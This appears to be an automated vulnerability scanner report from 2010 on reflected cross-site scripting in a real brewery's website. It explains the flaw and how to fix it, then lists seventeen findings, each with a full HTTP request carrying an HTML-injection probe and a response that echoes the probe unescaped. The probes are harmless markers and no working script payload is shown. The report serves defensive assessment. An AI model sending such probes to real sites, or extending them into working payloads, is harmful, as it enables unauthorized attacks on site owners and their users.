Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.ninkasibrewing.com/beer_finder/ [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder7cef6"><a>d1a9d545bb1_page" class="beer_finder7cef6">
...[SNIP]...

1.2. http://www.ninkasibrewing.com/beer_finder/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder19329"><a>8b6dab35f14_page" class="beer_finder19329">
...[SNIP]...

1.3. http://www.ninkasibrewing.com/beer_finder/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder6b114"><a>2a2a038a928_page" class="beer_finder6b114">
...[SNIP]...

1.4. http://www.ninkasibrewing.com/beer_finder/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder536f7"><a>2e8ea686748_page" class="beer_finder536f7">
...[SNIP]...

1.5. http://www.ninkasibrewing.com/beer_finder/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finderf4b6f"><a>5c83f0838cb_page" class="beer_finderf4b6f">
...[SNIP]...

1.6. http://www.ninkasibrewing.com/beer_finder/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder85e44"><a>7d1f97cbdd2_page" class="beer_finder85e44">
...[SNIP]...

1.7. http://www.ninkasibrewing.com/beer_finder/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beer_finder/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beer_finder392d4"><a>7acca5121c2_page" class="beer_finder392d4">
...[SNIP]...

1.8. http://www.ninkasibrewing.com/beers/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/playbook/?intcid=gnav

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beers4e8d2"><a>16a8c03f2fd_page" class="beers4e8d2">
...[SNIP]...

1.9. http://www.ninkasibrewing.com/beers/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beers41638"><a>88fb649091c_page" class="beers41638">
...[SNIP]...

1.10. http://www.ninkasibrewing.com/beers/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beers132d9"><a>11e6d305782_page" class="beers132d9">
...[SNIP]...

1.11. http://www.ninkasibrewing.com/beers/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beersf0387"><a>286a56ca007_page" class="beersf0387">
...[SNIP]...

1.12. http://www.ninkasibrewing.com/beers/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beers3dad3"><a>57b154d7fd1_page" class="beers3dad3">
...[SNIP]...

1.13. http://www.ninkasibrewing.com/beers/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beersed707"><a>9aff3285dbf_page" class="beersed707">
...[SNIP]...

1.14. http://www.ninkasibrewing.com/beers/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/beers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="beers3337e"><a>bf74ccda1f5_page" class="beers3337e">
...[SNIP]...

1.15. http://www.ninkasibrewing.com/brewery/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery72af8"><a>8c4153079a4_page" class="brewery72af8">
...[SNIP]...

1.16. http://www.ninkasibrewing.com/brewery/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery6ef1f"><a>2fabca1655f_page" class="brewery6ef1f">
...[SNIP]...

1.17. http://www.ninkasibrewing.com/brewery/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

